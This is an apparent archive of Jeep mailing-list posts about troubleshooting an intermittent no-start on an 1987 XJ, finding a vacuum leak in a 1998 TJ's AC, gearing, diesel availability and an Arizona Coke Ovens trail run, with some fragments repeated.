Just my .02! I would check your battery and charging system. May sound crazy, but if the battery voltage falls below a certain point during start up (8 volts, I think), the ignition will not fire. The engine may crank ok, but the computer won't trigger the ignition system to fire. That could also be the cause of your radio preset problem. May be worth a shot if the CPS un-plug solution doesn't help.
But as always, your mileage may vary (who used to always end their posts with this?! Been kinda driving me nuts lately. Yes, I know, short trip, and I oughtta be Jeepin' if I have that much free time, right?)

This happened to my XJ over its 200,000+ miles before I sold it. I replaced the crankshaft position sensor (CPS)several times and the problem kept recurring. I eventually determined that the problem could be resolved by simply disconnecting and then reconnecting the CPS. The CPS connector (2 pins in a 3 pin connector if memory serves) is located on the driver's side of the valve cover just in front of the firewall.
I guarantee this will work everytime! Throw nothing else at this problem!

This is going to be a bit long, but please bear with me. 87' XJ, 4.0,auto,Laredo pkg., 3" Skyjacker lift, Wilderness roof rack...etc.
Apx. 270,000 on vehicle, apx 50,000 on engine, trans, tc,. Ok, here we go, one June morning I go out to start her up, she fires right up as usual then dies, I restart her and go through this 3 times before she stays running, doesn't happen again for at least 3 more weeks, can't find anything wrong. About the first of July I go out and she turns over but will not start ( no fire at plug wires), the next day I go out and she fires right up and is fine for the next week or so and then one morning will not start again. In the meantime I find myself down in Phoenix so I stop in at Lou Grubb and pick up a new ignition module and coil since its never been replaced in the aformentioned 270K , after installing these I have no problem for at least 2 weeks then, yup, she turns over but will not start( yes I tried putting the old ign. mod and coil back in, no change), I'm mad, call tow truck, tow truck arrives, driver says hey this sounds like your ignition relay (under pass. side of hood on fender, five in a row)we pull one out and switch it for another one, she fires right up, unhook tow truck, smile, go to local dealer and purchase all 5 brand new and install. Yup same story, a week or so later turns over will not start, no fire at plug wires, mechanic friend in Phx. says R&R crank sensor. I did, works like a champ. go to Laughlin, get married, have fun, drive home, life is good. Yesterday go outside to fire her up (the Jeep) ,you guessed it, turns over fine, will not start, no fire at plug wires. So far have thrown plugs, Jacobs rotor, cap, and wires, relays, ignition mod and coil, and crank sensor at it and am still lost. All wire connections look good, ground to engine block is fine, fuel pressure and volume is fine, changed filter just for fun. Just in case all this isn't weird enough about the time all this started I lost the ability to keep the pre-sets on the radio, they stay for a day or so and then all revert back to 530, I know its probably unrelated but I'm desparate, I need to be in Texas on the 7th and the dealer can't even get me in up here until the 30th (Show Low), if he works on it Friday and then orders parts with the labor day weekend, well you see my situation. ANY thoughts or ideas will be most welcome. Thanks, Doc.

I used to keep mine mounted just inside the rear tail gate - from fender

Otherwise, I'd put it on the front bumper and not worry bout it.

If you want the same highway RPM's, put in a Tera-Low kit or if you
have a real good credit card, go with an Atlas t-case. The Tera-Low
is cheaper then a ring and pinion swap, and drops your gearing in low

Okay let me be more clear. I should not have said screetch, when I re-
read that It totally sounded like a belt problem. This is not that
belt sound. It is a really high pitch howl sound, like when you are
driving down the highway in a car and the window is barely cracked
open. Basically it sounds like a valve is trying to open to let air
though (the AC) and gets stuck just barely open, and then finally
after a minute or so it opens all the way, and the air comes out of
the vents (sound stops). So I would assume it was a vacuum leak
because the unit is not switching over from normal vent to AC easily.
The ACTUAL question was "how do I find a vacuum leak" can I do this
myself or do I need to take it somewhere? Thanks!! -Rob

Hello All,
Scott Grigsby is leading a Coke Ovens trail run on Saturday, September 1, 2001.
When: Monday. Labor Day
Where: meet at the Texaco at Florance Juct.
Rating: 2.5+
Length: better part of the day
CB Channel: 4
We go in the back way of battle axe road between Superior and Kearny. Lots of good Scenery to look at. We will come out in near Martinez Canyon.
The Coke Ovens Trail is an all day trip. It covers a lot of different countryside, traveling over and around the rolling hills and traverse some rocks and ledges in the road.
Years ago the Coke Ovens made "coke" for smelters at the nearby mines. Over the years they have been closed to the public numerous times and several have been used as "housing" for the hermits of the hills.
At this time we are able to see and explore these amazing creations. They are located on the side of a hill along the Gila River and are quite spectacular.
This trail is definitely a favorite for all levels of 4-wheelers. Stock vehicles shouldn't have any problems although clearance is highly recommended. There are several areas of "rock stair steps" that will be a challenge to the novice or stock driver.

Rob,
On the right hand side fender near the firewall, there is a vacuum canister.
The canister is actually mounted to the fender almost directly beneath the
battery, You'll see the vacuum line there. Check to see if your canister
is disconnected by looking at the vacuum hose (there is just one running to
it) and making sure it is connected. If the noise you notice changes tone
or acts differently as a function of throttle (floored vs idle) then most
likely it is a vacuum problem.
Check the canister and let me know what you find.

Joe West

Maybe the CAM position sensor, located in the distributor.
Having memory presets go away scares me a bit. If battery
voltage goes below ~9V, there will be no spark.
Sounds like typical Crank sensor issues, but you say you
have swapped it out already. When you get into a no-start
condition - take a peek at the tach. See if it sits there
like a bump on a log, or see if it bounces. No motion
indicates a CPS fault. Clean the connection, dielectric
grease, good grounds just to be sure.

Nick,
Diesels are available as an option on Jeeps in most countries other than the
US. However the diesels used are hard to come by and are not available
(even used) in the US.
There was a thread on this topic - with diesel solutions - on both the
'jeep' and 'stroker' lists.
You can subscribe to them and then search the archives. Here are the URLs:
jeep-subscribe@yahoogroups.com
strokers-subscribe@yahoogroups.com
Hope this helps.

I used to keep mine mounted just inside the rear tail gate - from fender

Otherwise, I'd put it on the front bumper and not worry bout it.

Subject: 98 TJ AC switching Prob
Thanks!! -Rob

Enjoy and remember to TREAD Lightly!

Rob,
On the right hand side fender near the firewall, there is a vacuum canister.
Regards,

I suppose it depends on what you want in a trail. FR300, the Mogollon
Rim Road is up in that area, but its a 1- trail. (passable in a
street racer, just about :)
